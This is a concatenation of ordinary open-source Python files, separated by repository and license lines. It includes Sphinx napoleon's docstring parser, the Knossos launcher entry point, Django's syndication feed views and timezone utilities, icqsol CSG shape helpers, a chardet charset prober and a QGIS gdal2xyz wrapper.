self._is_in_section = False
self._section_indent = 0
else:
if not self._parsed_lines:
lines = self._consume_contiguous() + self._consume_empty()
else:
lines = self._consume_to_next_section()
self._parsed_lines.extend(lines)
def _parse_attribute_docstring(self):
_type, _desc = self._consume_inline_attribute()
return self._format_field('', _type, _desc)
def _parse_attributes_section(self, section):
lines = []
for _name, _type, _desc in self._consume_fields():
if self._config.napoleon_use_ivar:
field = ':ivar %s: ' % _name
lines.extend(self._format_block(field, _desc))
if _type:
lines.append(':vartype %s: %s' % (_name, _type))
else:
lines.extend(['.. attribute:: ' + _name, ''])
field = self._format_field('', _type, _desc)
lines.extend(self._indent(field, 3))
lines.append('')
if self._config.napoleon_use_ivar:
lines.append('')
return lines
def _parse_examples_section(self, section):
use_admonition = self._config.napoleon_use_admonition_for_examples
return self._parse_generic_section(section, use_admonition)
def _parse_usage_section(self, section):
header = ['.. rubric:: Usage:', '']
block = ['.. code-block:: python', '']
lines = self._consume_usage_section()
lines = self._indent(lines, 3)
return header + block + lines + ['']
def _parse_generic_section(self, section, use_admonition):
lines = self._strip_empty(self._consume_to_next_section())
lines = self._dedent(lines)
if use_admonition:
header = '.. admonition:: %s' % section
lines = self._indent(lines, 3)
else:
header = '.. rubric:: %s' % section
if lines:
return [header, ''] + lines + ['']
else:
return [header, '']
def _parse_keyword_arguments_section(self, section):
return self._format_fields('Keyword Arguments', self._consume_fields())
def _parse_methods_section(self, section):
lines = []
for _name, _, _desc in self._consume_fields(parse_type=False):
lines.append('.. method:: %s' % _name)
if _desc:
lines.extend([''] + self._indent(_desc, 3))
lines.append('')
return lines
def _parse_note_section(self, section):
lines = self._consume_to_next_section()
return self._format_admonition('note', lines)
def _parse_notes_section(self, section):
use_admonition = self._config.napoleon_use_admonition_for_notes
return self._parse_generic_section('Notes', use_admonition)
def _parse_other_parameters_section(self, section):
return self._format_fields('Other Parameters', self._consume_fields())
def _parse_parameters_section(self, section):
fields = self._consume_fields()
if self._config.napoleon_use_param:
lines = []
for _name, _type, _desc in fields:
field = ':param %s: ' % _name
lines.extend(self._format_block(field, _desc))
if _type:
lines.append(':type %s: %s' % (_name, _type))
return lines + ['']
else:
return self._format_fields('Parameters', fields)
def _parse_raises_section(self, section):
fields = self._consume_fields(parse_type=False, prefer_type=True)
field_type = ':raises:'
padding = ' ' * len(field_type)
multi = len(fields) > 1
lines = []
for _, _type, _desc in fields:
_desc = self._strip_empty(_desc)
has_desc = any(_desc)
separator = has_desc and ' -- ' or ''
if _type:
has_refs = '`' in _type or ':' in _type
has_space = any(c in ' \t\n\v\f ' for c in _type)
if not has_refs and not has_space:
_type = ':exc:`%s`%s' % (_type, separator)
elif has_desc and has_space:
_type = '*%s*%s' % (_type, separator)
else:
_type = '%s%s' % (_type, separator)
if has_desc:
field = [_type + _desc[0]] + _desc[1:]
else:
field = [_type]
else:
field = _desc
if multi:
if lines:
lines.extend(self._format_block(padding + ' * ', field))
else:
lines.extend(self._format_block(field_type + ' * ', field))
else:
lines.extend(self._format_block(field_type + ' ', field))
if lines and lines[-1]:
lines.append('')
return lines
def _parse_references_section(self, section):
use_admonition = self._config.napoleon_use_admonition_for_references
return self._parse_generic_section('References', use_admonition)
def _parse_returns_section(self, section):
fields = self._consume_returns_section()
multi = len(fields) > 1
if multi:
use_rtype = False
else:
use_rtype = self._config.napoleon_use_rtype
lines = []
for _name, _type, _desc in fields:
if use_rtype:
field = self._format_field(_name, '', _desc)
else:
field = self._format_field(_name, _type, _desc)
if multi:
if lines:
lines.extend(self._format_block(' * ', field))
else:
lines.extend(self._format_block(':returns: * ', field))
else:
lines.extend(self._format_block(':returns: ', field))
if _type and use_rtype:
lines.extend([':rtype: %s' % _type, ''])
if lines and lines[-1]:
lines.append('')
return lines
def _parse_see_also_section(self, section):
lines = self._consume_to_next_section()
return self._format_admonition('seealso', lines)
def _parse_warning_section(self, section):
lines = self._consume_to_next_section()
return self._format_admonition('warning', lines)
def _parse_warns_section(self, section):
return self._format_fields('Warns', self._consume_fields())
def _parse_yields_section(self, section):
fields = self._consume_returns_section()
return self._format_fields('Yields', fields)
def _partition_field_on_colon(self, line):
before_colon = []
after_colon = []
colon = ''
found_colon = False
for i, source in enumerate(_xref_regex.split(line)):
if found_colon:
after_colon.append(source)
else:
if (i % 2) == 0 and ":" in source:
found_colon = True
before, colon, after = source.partition(":")
before_colon.append(before)
after_colon.append(after)
else:
before_colon.append(source)
return ("".join(before_colon).strip(),
colon,
"".join(after_colon).strip())
def _strip_empty(self, lines):
if lines:
start = -1
for i, line in enumerate(lines):
if line:
start = i
break
if start == -1:
lines = []
end = -1
for i in reversed(range(len(lines))):
line = lines[i]
if line:
end = i
break
if start > 0 or end + 1 < len(lines):
lines = lines[start:end + 1]
return lines
class NumpyDocstring(GoogleDocstring):
"""Convert NumPy style docstrings to reStructuredText.
Parameters
----------
docstring : str or List[str]
The docstring to parse, given either as a string or split into
individual lines.
config : Optional[sphinxcontrib.napoleon.Config or sphinx.config.Config]
        The configuration settings to use. If not given, defaults to the
        config object on `app`; or, if `app` is not given, defaults to a
        new `sphinxcontrib.napoleon.Config` object.
See Also
--------
:class:`sphinxcontrib.napoleon.Config`
Other Parameters
----------------
app : Optional[sphinx.application.Sphinx]
Application object representing the Sphinx process.
what : Optional[str]
A string specifying the type of the object to which the docstring
belongs. Valid values: "module", "class", "exception", "function",
"method", "attribute".
name : Optional[str]
The fully qualified name of the object.
obj : module, class, exception, function, method, or attribute
The object to which the docstring belongs.
options : Optional[sphinx.ext.autodoc.Options]
The options given to the directive: an object with attributes
inherited_members, undoc_members, show_inheritance and noindex that
are True if the flag option of same name was given to the auto
directive.
Example
-------
>>> from sphinxcontrib.napoleon import Config
>>> config = Config(napoleon_use_param=True, napoleon_use_rtype=True)
>>> docstring = '''One line summary.
...
... Extended description.
...
... Parameters
... ----------
... arg1 : int
... Description of `arg1`
... arg2 : str
... Description of `arg2`
... Returns
... -------
... str
... Description of return value.
... '''
>>> print(NumpyDocstring(docstring, config))
One line summary.
<BLANKLINE>
Extended description.
<BLANKLINE>
:param arg1: Description of `arg1`
:type arg1: int
:param arg2: Description of `arg2`
:type arg2: str
<BLANKLINE>
:returns: Description of return value.
:rtype: str
<BLANKLINE>
Methods
-------
__str__()
Return the parsed docstring in reStructuredText format.
Returns
-------
str
UTF-8 encoded version of the docstring.
__unicode__()
Return the parsed docstring in reStructuredText format.
Returns
-------
unicode
Unicode version of the docstring.
lines()
Return the parsed lines of the docstring in reStructuredText format.
Returns
-------
List[str]
The lines of the docstring in a list.
"""
def __init__(self, docstring, config=None, app=None, what='', name='',
obj=None, options=None):
self._directive_sections = ['.. index::']
super(NumpyDocstring, self).__init__(docstring, config, app, what,
name, obj, options)
def _consume_field(self, parse_type=True, prefer_type=False):
line = next(self._line_iter)
if parse_type:
_name, _, _type = self._partition_field_on_colon(line)
else:
_name, _type = line, ''
_name, _type = _name.strip(), _type.strip()
if prefer_type and not _type:
_type, _name = _name, _type
if _name[:2] == '**':
_name = r'\*\*'+_name[2:]
elif _name[:1] == '*':
_name = r'\*'+_name[1:]
indent = self._get_indent(line)
_desc = self._dedent(self._consume_indented_block(indent + 1))
_desc = self.__class__(_desc, self._config).lines()
return _name, _type, _desc
def _consume_returns_section(self):
return self._consume_fields(prefer_type=True)
def _consume_section_header(self):
section = next(self._line_iter)
if not _directive_regex.match(section):
# Consume the header underline
next(self._line_iter)
return section
def _is_section_break(self):
line1, line2 = self._line_iter.peek(2)
return (not self._line_iter.has_next() or
self._is_section_header() or
['', ''] == [line1, line2] or
(self._is_in_section and
line1 and
not self._is_indented(line1, self._section_indent)))
def _is_section_header(self):
section, underline = self._line_iter.peek(2)
section = section.lower()
if section in self._sections and isinstance(underline, string_types):
return bool(_numpy_section_regex.match(underline))
elif self._directive_sections:
if _directive_regex.match(section):
for directive_section in self._directive_sections:
if section.startswith(directive_section):
return True
return False
_name_rgx = re.compile(r"^\s*(:(?P<role>\w+):`(?P<name>[a-zA-Z0-9_.-]+)`|"
r" (?P<name2>[a-zA-Z0-9_.-]+))\s*", re.X)
def _parse_see_also_section(self, section):
lines = self._consume_to_next_section()
try:
return self._parse_numpydoc_see_also_section(lines)
except ValueError:
return self._format_admonition('seealso', lines)
def _parse_numpydoc_see_also_section(self, content):
"""
Derived from the NumpyDoc implementation of _parse_see_also.
See Also
--------
func_name : Descriptive text
continued text
another_func_name : Descriptive text
func_name1, func_name2, :meth:`func_name`, func_name3
"""
items = []
def parse_item_name(text):
"""Match ':role:`name`' or 'name'"""
m = self._name_rgx.match(text)
if m:
g = m.groups()
if g[1] is None:
return g[3], None
else:
return g[2], g[1]
            raise ValueError("%s is not an item name" % text)
def push_item(name, rest):
if not name:
return
name, role = parse_item_name(name)
items.append((name, list(rest), role))
del rest[:]
current_func = None
rest = []
for line in content:
if not line.strip():
continue
m = self._name_rgx.match(line)
if m and line[m.end():].strip().startswith(':'):
push_item(current_func, rest)
current_func, line = line[:m.end()], line[m.end():]
rest = [line.split(':', 1)[1].strip()]
if not rest[0]:
rest = []
elif not line.startswith(' '):
push_item(current_func, rest)
current_func = None
if ',' in line:
for func in line.split(','):
if func.strip():
push_item(func, [])
elif line.strip():
current_func = line
elif current_func is not None:
rest.append(line.strip())
push_item(current_func, rest)
if not items:
return []
roles = {
'method': 'meth',
'meth': 'meth',
'function': 'func',
'func': 'func',
'class': 'class',
'exception': 'exc',
'exc': 'exc',
'object': 'obj',
'obj': 'obj',
'module': 'mod',
'mod': 'mod',
'data': 'data',
'constant': 'const',
'const': 'const',
'attribute': 'attr',
'attr': 'attr'
}
if self._what is None:
func_role = 'obj'
else:
func_role = roles.get(self._what, '')
lines = []
last_had_desc = True
for func, desc, role in items:
if role:
link = ':%s:`%s`' % (role, func)
elif func_role:
link = ':%s:`%s`' % (func_role, func)
else:
link = "`%s`_" % func
if desc or last_had_desc:
lines += ['']
lines += [link]
else:
lines[-1] += ", %s" % link
if desc:
lines += self._indent([' '.join(desc)])
last_had_desc = True
else:
last_had_desc = False
lines += ['']
return self._format_admonition('seealso', lines)
| apache-2.0 |
MjnMixael/knossos | knossos/__main__.py | 1 | 3121 | #!/usr/bin/python
## Copyright 2017 Knossos authors, see NOTICE file
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
from __future__ import absolute_import, print_function
import sys
if __package__ is None and not hasattr(sys, 'frozen'):
import os.path
path = os.path.realpath(os.path.abspath(__file__))
sys.path.insert(0, os.path.dirname(os.path.dirname(path)))
if len(sys.argv) > 1 and sys.argv[1] == '--cpuinfo':
# We don't need to initialize knossos if we only need to fetch the CPU info.
import json
from knossos.third_party import cpuinfo
info = None
try:
info = cpuinfo.get_cpu_info()
except Exception:
from knossos.launcher import logging
logging.exception('Failed to retrieve CPU info.')
print(json.dumps(info))
elif len(sys.argv) > 1 and sys.argv[1] == '--run-cpuid':
from knossos.third_party import cpuinfo
print(cpuinfo._actual_get_cpu_info_from_cpuid())
elif len(sys.argv) > 1 and sys.argv[1] == '--deviceinfo':
import json
from knossos import clibs
clibs.init_sdl()
clibs.init_openal()
if clibs.can_detect_audio():
audio_devs = clibs.list_audio_devs()
else:
audio_devs = None
print(json.dumps({
'modes': clibs.get_modes(),
'audio_devs': audio_devs,
'joysticks': clibs.list_joysticks()
}))
elif len(sys.argv) > 1 and sys.argv[1] == '--fso-config-path':
from knossos import clibs
clibs.init_sdl()
print(clibs.get_config_path())
elif len(sys.argv) > 1 and sys.argv[1] == '--lib-paths':
import json
from knossos import clibs, center
if len(sys.argv) > 3:
if sys.argv[2] == 'auto':
center.settings['sdl2_path'] = None
else:
center.settings['sdl2_path'] = sys.argv[2]
if sys.argv[3] == 'auto':
center.settings['openal_path'] = None
else:
center.settings['openal_path'] = sys.argv[3]
try:
clibs.init_sdl()
except Exception:
clibs.sdl = None
try:
clibs.init_openal()
except Exception:
        clibs.alc = None
if center.settings['sdl2_path'] and clibs.sdl:
if clibs.sdl._name != center.settings['sdl2_path']:
clibs.sdl = None
if center.settings['openal_path'] and clibs.alc:
if clibs.alc._name != center.settings['openal_path']:
clibs.alc = None
print(json.dumps({
'sdl2': clibs.sdl._name if clibs.sdl else None,
'openal': clibs.alc._name if clibs.alc else None
}))
else:
from knossos import launcher
launcher.main()
| apache-2.0 |
diegoguimaraes/django | django/contrib/syndication/views.py | 31 | 8809 | from __future__ import unicode_literals
from calendar import timegm
from django.conf import settings
from django.contrib.sites.shortcuts import get_current_site
from django.core.exceptions import ImproperlyConfigured, ObjectDoesNotExist
from django.http import HttpResponse, Http404
from django.template import loader, TemplateDoesNotExist, RequestContext
from django.utils import feedgenerator
from django.utils.encoding import force_text, iri_to_uri, smart_text
from django.utils.html import escape
from django.utils.http import http_date
from django.utils import six
from django.utils.timezone import get_default_timezone, is_naive, make_aware
def add_domain(domain, url, secure=False):
protocol = 'https' if secure else 'http'
if url.startswith('//'):
# Support network-path reference (see #16753) - RSS requires a protocol
url = '%s:%s' % (protocol, url)
elif not (url.startswith('http://')
or url.startswith('https://')
or url.startswith('mailto:')):
url = iri_to_uri('%s://%s%s' % (protocol, domain, url))
return url
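# Illustrative results of add_domain (domain and URLs are made-up values):
#   add_domain('example.com', '/feed/')                 -> 'http://example.com/feed/'
#   add_domain('example.com', '/feed/', secure=True)    -> 'https://example.com/feed/'
#   add_domain('example.com', '//media.example.com/f/') -> 'http://media.example.com/f/'
#   add_domain('example.com', 'https://other.com/f/')   -> 'https://other.com/f/' (unchanged)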
class FeedDoesNotExist(ObjectDoesNotExist):
pass
class Feed(object):
feed_type = feedgenerator.DefaultFeed
title_template = None
description_template = None
def __call__(self, request, *args, **kwargs):
try:
obj = self.get_object(request, *args, **kwargs)
except ObjectDoesNotExist:
raise Http404('Feed object does not exist.')
feedgen = self.get_feed(obj, request)
response = HttpResponse(content_type=feedgen.mime_type)
if hasattr(self, 'item_pubdate') or hasattr(self, 'item_updateddate'):
# if item_pubdate or item_updateddate is defined for the feed, set
            # the header so that ConditionalGetMiddleware is able to send 304 NOT MODIFIED
response['Last-Modified'] = http_date(
timegm(feedgen.latest_post_date().utctimetuple()))
feedgen.write(response, 'utf-8')
return response
def item_title(self, item):
# Titles should be double escaped by default (see #6533)
return escape(force_text(item))
def item_description(self, item):
return force_text(item)
def item_link(self, item):
try:
return item.get_absolute_url()
except AttributeError:
raise ImproperlyConfigured(
'Give your %s class a get_absolute_url() method, or define an '
'item_link() method in your Feed class.' % item.__class__.__name__
)
def __get_dynamic_attr(self, attname, obj, default=None):
try:
attr = getattr(self, attname)
except AttributeError:
return default
if callable(attr):
# Check co_argcount rather than try/excepting the function and
# catching the TypeError, because something inside the function
# may raise the TypeError. This technique is more accurate.
try:
code = six.get_function_code(attr)
except AttributeError:
code = six.get_function_code(attr.__call__)
if code.co_argcount == 2: # one argument is 'self'
return attr(obj)
else:
return attr()
return attr
def feed_extra_kwargs(self, obj):
"""
Returns an extra keyword arguments dictionary that is used when
initializing the feed generator.
"""
return {}
def item_extra_kwargs(self, item):
"""
Returns an extra keyword arguments dictionary that is used with
the `add_item` call of the feed generator.
"""
return {}
def get_object(self, request, *args, **kwargs):
return None
def get_context_data(self, **kwargs):
"""
Returns a dictionary to use as extra context if either
``self.description_template`` or ``self.item_template`` are used.
Default implementation preserves the old behavior
of using {'obj': item, 'site': current_site} as the context.
"""
return {'obj': kwargs.get('item'), 'site': kwargs.get('site')}
def get_feed(self, obj, request):
"""
Returns a feedgenerator.DefaultFeed object, fully populated, for
this feed. Raises FeedDoesNotExist for invalid parameters.
"""
current_site = get_current_site(request)
link = self.__get_dynamic_attr('link', obj)
link = add_domain(current_site.domain, link, request.is_secure())
feed = self.feed_type(
title=self.__get_dynamic_attr('title', obj),
subtitle=self.__get_dynamic_attr('subtitle', obj),
link=link,
description=self.__get_dynamic_attr('description', obj),
language=settings.LANGUAGE_CODE,
feed_url=add_domain(
current_site.domain,
self.__get_dynamic_attr('feed_url', obj) or request.path,
request.is_secure(),
),
author_name=self.__get_dynamic_attr('author_name', obj),
author_link=self.__get_dynamic_attr('author_link', obj),
author_email=self.__get_dynamic_attr('author_email', obj),
categories=self.__get_dynamic_attr('categories', obj),
feed_copyright=self.__get_dynamic_attr('feed_copyright', obj),
feed_guid=self.__get_dynamic_attr('feed_guid', obj),
ttl=self.__get_dynamic_attr('ttl', obj),
**self.feed_extra_kwargs(obj)
)
title_tmp = None
if self.title_template is not None:
try:
title_tmp = loader.get_template(self.title_template)
except TemplateDoesNotExist:
pass
description_tmp = None
if self.description_template is not None:
try:
description_tmp = loader.get_template(self.description_template)
except TemplateDoesNotExist:
pass
for item in self.__get_dynamic_attr('items', obj):
context = self.get_context_data(item=item, site=current_site,
obj=obj, request=request)
if title_tmp is not None:
title = title_tmp.render(RequestContext(request, context))
else:
title = self.__get_dynamic_attr('item_title', item)
if description_tmp is not None:
description = description_tmp.render(RequestContext(request, context))
else:
description = self.__get_dynamic_attr('item_description', item)
link = add_domain(
current_site.domain,
self.__get_dynamic_attr('item_link', item),
request.is_secure(),
)
enc = None
enc_url = self.__get_dynamic_attr('item_enclosure_url', item)
if enc_url:
enc = feedgenerator.Enclosure(
url=smart_text(enc_url),
length=smart_text(self.__get_dynamic_attr('item_enclosure_length', item)),
mime_type=smart_text(self.__get_dynamic_attr('item_enclosure_mime_type', item))
)
author_name = self.__get_dynamic_attr('item_author_name', item)
if author_name is not None:
author_email = self.__get_dynamic_attr('item_author_email', item)
author_link = self.__get_dynamic_attr('item_author_link', item)
else:
author_email = author_link = None
tz = get_default_timezone()
pubdate = self.__get_dynamic_attr('item_pubdate', item)
if pubdate and is_naive(pubdate):
pubdate = make_aware(pubdate, tz)
updateddate = self.__get_dynamic_attr('item_updateddate', item)
if updateddate and is_naive(updateddate):
updateddate = make_aware(updateddate, tz)
feed.add_item(
title=title,
link=link,
description=description,
unique_id=self.__get_dynamic_attr('item_guid', item, link),
unique_id_is_permalink=self.__get_dynamic_attr(
'item_guid_is_permalink', item),
enclosure=enc,
pubdate=pubdate,
updateddate=updateddate,
author_name=author_name,
author_email=author_email,
author_link=author_link,
categories=self.__get_dynamic_attr('item_categories', item),
item_copyright=self.__get_dynamic_attr('item_copyright', item),
**self.item_extra_kwargs(item)
)
return feed
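# A minimal sketch of a Feed subclass wired through the hooks resolved by
# __get_dynamic_attr above; the `Entry` model and its fields are
# hypothetical stand-ins, not part of this module.
#
#   class LatestEntriesFeed(Feed):
#       title = 'Site news'
#       link = '/news/'
#       description = 'Latest updates.'
#
#       def items(self):
#           return Entry.objects.order_by('-pub_date')[:5]
#
#       def item_title(self, item):    # default would be escape(force_text(item))
#           return item.title
#
#       def item_pubdate(self, item):  # also enables the Last-Modified header
#           return item.pub_date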
| bsd-3-clause |
gregvonkuster/icqsol | shapes/icqShape.py | 2 | 2584 | #!/usr/bin/env python
"""
@brief A base class for constructing shapes
@author [email protected]
"""
from __future__ import print_function
from csg.core import CSG
from csg.geom import Vector
import numpy
DEFAULTS = dict(origin=[0.0, 0.0, 0.0],
lengths=[1.0, 1.0, 1.0],
radius=1.0,
angle=90.0,
n_theta=16,
n_phi=8)
def Box(origin, lengths):
"""
Create box
    @param origin low end of the box
@param lengths lengths in x, y, and z
"""
center = [origin[i] + 0.5*lengths[i] for i in range(len(origin))]
radius = [0.5*le for le in lengths]
return CSG.cube(center=center, radius=radius)
def Cone(radius, origin, lengths, n_theta=16):
"""
Create cone
@param radius radius
@param origin location of the focal point
    @param lengths lengths of the cone along each axis
@param n_theta number of theta cells
"""
ori = Vector(origin[0], origin[1], origin[2])
end = Vector(origin[0] + lengths[0],
origin[1] + lengths[1],
origin[2] + lengths[2])
return CSG.cone(start=ori,
end=end,
radius=radius,
slices=n_theta)
def Cylinder(radius, origin, lengths, n_theta=16):
"""
Create cylinder
@param radius radius
@param origin center of low end disk
@param lengths lengths of the cylinder along each axis
@param n_theta number of theta cells
"""
ori = Vector(origin[0], origin[1], origin[2])
end = Vector(origin[0] + lengths[0],
origin[1] + lengths[1],
origin[2] + lengths[2])
return CSG.cylinder(start=ori,
end=end,
radius=radius,
slices=n_theta)
def Sphere(radius, origin, n_theta=16, n_phi=8):
"""
Create sphere
@param radius radius
@param origin center of the sphere
@param n_theta number of theta cells
@param n_phi number of azimuthal cells
"""
return CSG.sphere(center=origin,
radius=radius,
slices=n_theta,
stacks=n_phi)
def CompositeShape(shape_tuples=[], expression=''):
"""
@param shape_tuples list of (variable_name, shape) pairs
@param expression expression involving +, -, and * operations.
"""
for i in range(len(shape_tuples)):
varName = shape_tuples[i][0]
cmd = '{0} = shape_tuples[{1}][1]'.format(varName, i)
exec(cmd)
return eval(expression)
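# Illustrative usage of CompositeShape; the variable names and dimensions
# are made up, and the operator meanings (conventionally '+' union,
# '*' intersection, '-' difference) are assumed from standard CSG practice:
#
#   s = Sphere(radius=1.0, origin=[0.0, 0.0, 0.0])
#   b = Box(origin=[0.0, 0.0, 0.0], lengths=[1.0, 1.0, 1.0])
#   shape = CompositeShape([('s', s), ('b', b)], expression='s - b')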
| mit |
Vishruit/DDP_models | tf1/lib/python2.7/site-packages/pip/_vendor/requests/packages/charade/sbcsgroupprober.py | 2936 | 3291 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .charsetgroupprober import CharSetGroupProber
from .sbcharsetprober import SingleByteCharSetProber
from .langcyrillicmodel import (Win1251CyrillicModel, Koi8rModel,
Latin5CyrillicModel, MacCyrillicModel,
Ibm866Model, Ibm855Model)
from .langgreekmodel import Latin7GreekModel, Win1253GreekModel
from .langbulgarianmodel import Latin5BulgarianModel, Win1251BulgarianModel
from .langhungarianmodel import Latin2HungarianModel, Win1250HungarianModel
from .langthaimodel import TIS620ThaiModel
from .langhebrewmodel import Win1255HebrewModel
from .hebrewprober import HebrewProber
class SBCSGroupProber(CharSetGroupProber):
def __init__(self):
CharSetGroupProber.__init__(self)
self._mProbers = [
SingleByteCharSetProber(Win1251CyrillicModel),
SingleByteCharSetProber(Koi8rModel),
SingleByteCharSetProber(Latin5CyrillicModel),
SingleByteCharSetProber(MacCyrillicModel),
SingleByteCharSetProber(Ibm866Model),
SingleByteCharSetProber(Ibm855Model),
SingleByteCharSetProber(Latin7GreekModel),
SingleByteCharSetProber(Win1253GreekModel),
SingleByteCharSetProber(Latin5BulgarianModel),
SingleByteCharSetProber(Win1251BulgarianModel),
SingleByteCharSetProber(Latin2HungarianModel),
SingleByteCharSetProber(Win1250HungarianModel),
SingleByteCharSetProber(TIS620ThaiModel),
]
hebrewProber = HebrewProber()
logicalHebrewProber = SingleByteCharSetProber(Win1255HebrewModel,
False, hebrewProber)
visualHebrewProber = SingleByteCharSetProber(Win1255HebrewModel, True,
hebrewProber)
hebrewProber.set_model_probers(logicalHebrewProber, visualHebrewProber)
self._mProbers.extend([hebrewProber, logicalHebrewProber,
visualHebrewProber])
self.reset()
| gpl-3.0 |
siliconsmiley/QGIS | python/plugins/processing/algs/gdal/gdal2xyz.py | 1 | 2574 | # -*- coding: utf-8 -*-
"""
***************************************************************************
gdal2xyz.py
---------------------
Date : September 2013
Copyright : (C) 2013 by Alexander Bruy
Email : alexander dot bruy at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Alexander Bruy'
__date__ = 'September 2013'
__copyright__ = '(C) 2013, Alexander Bruy'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from processing.algs.gdal.GdalAlgorithm import GdalAlgorithm
from processing.core.parameters import ParameterRaster
from processing.core.parameters import ParameterNumber
from processing.core.outputs import OutputTable
from processing.tools.system import isWindows
from processing.algs.gdal.GdalUtils import GdalUtils
class gdal2xyz(GdalAlgorithm):
INPUT = 'INPUT'
BAND = 'BAND'
OUTPUT = 'OUTPUT'
def defineCharacteristics(self):
self.name, self.i18n_name = self.trAlgorithm('gdal2xyz')
self.group, self.i18n_group = self.trAlgorithm('[GDAL] Conversion')
self.addParameter(ParameterRaster(
self.INPUT, self.tr('Input layer'), False))
self.addParameter(ParameterNumber(self.BAND,
self.tr('Band number'), 1, 9999, 1))
self.addOutput(OutputTable(self.OUTPUT, self.tr('xyz')))
def getConsoleCommands(self):
arguments = []
arguments.append('-band')
arguments.append(unicode(self.getParameterValue(self.BAND)))
arguments.append('-csv')
arguments.append(self.getParameterValue(self.INPUT))
arguments.append(self.getOutputValue(self.OUTPUT))
commands = []
if isWindows():
commands = ['cmd.exe', '/C ', 'gdal2xyz.bat',
GdalUtils.escapeAndJoin(arguments)]
else:
commands = ['gdal2xyz.py', GdalUtils.escapeAndJoin(arguments)]
return commands
| gpl-2.0 |
IKholopov/HackUPC2017 | hackupc/env/lib/python3.5/site-packages/django/utils/timezone.py | 57 | 11145 | """
Timezone-related classes and functions.
This module uses pytz when it's available and fallbacks when it isn't.
"""
import sys
import time as _time
from datetime import datetime, timedelta, tzinfo
from threading import local
from django.conf import settings
from django.utils import lru_cache, six
from django.utils.decorators import ContextDecorator
try:
import pytz
except ImportError:
pytz = None
__all__ = [
'utc', 'get_fixed_timezone',
'get_default_timezone', 'get_default_timezone_name',
'get_current_timezone', 'get_current_timezone_name',
'activate', 'deactivate', 'override',
'localtime', 'now',
'is_aware', 'is_naive', 'make_aware', 'make_naive',
]
# UTC and local time zones
ZERO = timedelta(0)
class UTC(tzinfo):
"""
UTC implementation taken from Python's docs.
Used only when pytz isn't available.
"""
def __repr__(self):
return "<UTC>"
def utcoffset(self, dt):
return ZERO
def tzname(self, dt):
return "UTC"
def dst(self, dt):
return ZERO
class FixedOffset(tzinfo):
"""
Fixed offset in minutes east from UTC. Taken from Python's docs.
Kept as close as possible to the reference version. __init__ was changed
to make its arguments optional, according to Python's requirement that
tzinfo subclasses can be instantiated without arguments.
"""
def __init__(self, offset=None, name=None):
if offset is not None:
self.__offset = timedelta(minutes=offset)
if name is not None:
self.__name = name
def utcoffset(self, dt):
return self.__offset
def tzname(self, dt):
return self.__name
def dst(self, dt):
return ZERO
class ReferenceLocalTimezone(tzinfo):
"""
Local time. Taken from Python's docs.
Used only when pytz isn't available, and most likely inaccurate. If you're
having trouble with this class, don't waste your time, just install pytz.
Kept as close as possible to the reference version. __init__ was added to
delay the computation of STDOFFSET, DSTOFFSET and DSTDIFF which is
performed at import time in the example.
Subclasses contain further improvements.
"""
def __init__(self):
self.STDOFFSET = timedelta(seconds=-_time.timezone)
if _time.daylight:
self.DSTOFFSET = timedelta(seconds=-_time.altzone)
else:
self.DSTOFFSET = self.STDOFFSET
self.DSTDIFF = self.DSTOFFSET - self.STDOFFSET
tzinfo.__init__(self)
def utcoffset(self, dt):
if self._isdst(dt):
return self.DSTOFFSET
else:
return self.STDOFFSET
def dst(self, dt):
if self._isdst(dt):
return self.DSTDIFF
else:
return ZERO
def tzname(self, dt):
return _time.tzname[self._isdst(dt)]
def _isdst(self, dt):
tt = (dt.year, dt.month, dt.day,
dt.hour, dt.minute, dt.second,
dt.weekday(), 0, 0)
stamp = _time.mktime(tt)
tt = _time.localtime(stamp)
return tt.tm_isdst > 0
class LocalTimezone(ReferenceLocalTimezone):
"""
Slightly improved local time implementation focusing on correctness.
It still crashes on dates before 1970 or after 2038, but at least the
error message is helpful.
"""
def tzname(self, dt):
is_dst = False if dt is None else self._isdst(dt)
return _time.tzname[is_dst]
def _isdst(self, dt):
try:
return super(LocalTimezone, self)._isdst(dt)
except (OverflowError, ValueError) as exc:
exc_type = type(exc)
exc_value = exc_type(
"Unsupported value: %r. You should install pytz." % dt)
exc_value.__cause__ = exc
if not hasattr(exc, '__traceback__'):
exc.__traceback__ = sys.exc_info()[2]
six.reraise(exc_type, exc_value, sys.exc_info()[2])
utc = pytz.utc if pytz else UTC()
"""UTC time zone as a tzinfo instance."""
def get_fixed_timezone(offset):
"""
Returns a tzinfo instance with a fixed offset from UTC.
"""
if isinstance(offset, timedelta):
offset = offset.seconds // 60
sign = '-' if offset < 0 else '+'
hhmm = '%02d%02d' % divmod(abs(offset), 60)
name = sign + hhmm
return FixedOffset(offset, name)
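# e.g. get_fixed_timezone(330) returns a tzinfo named '+0530' (UTC+05:30);
# a timedelta argument is first converted to whole minutes above.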
# In order to avoid accessing settings at compile time,
# wrap the logic in a function and cache the result.
@lru_cache.lru_cache()
def get_default_timezone():
"""
Returns the default time zone as a tzinfo instance.
This is the time zone defined by settings.TIME_ZONE.
"""
if isinstance(settings.TIME_ZONE, six.string_types) and pytz is not None:
return pytz.timezone(settings.TIME_ZONE)
else:
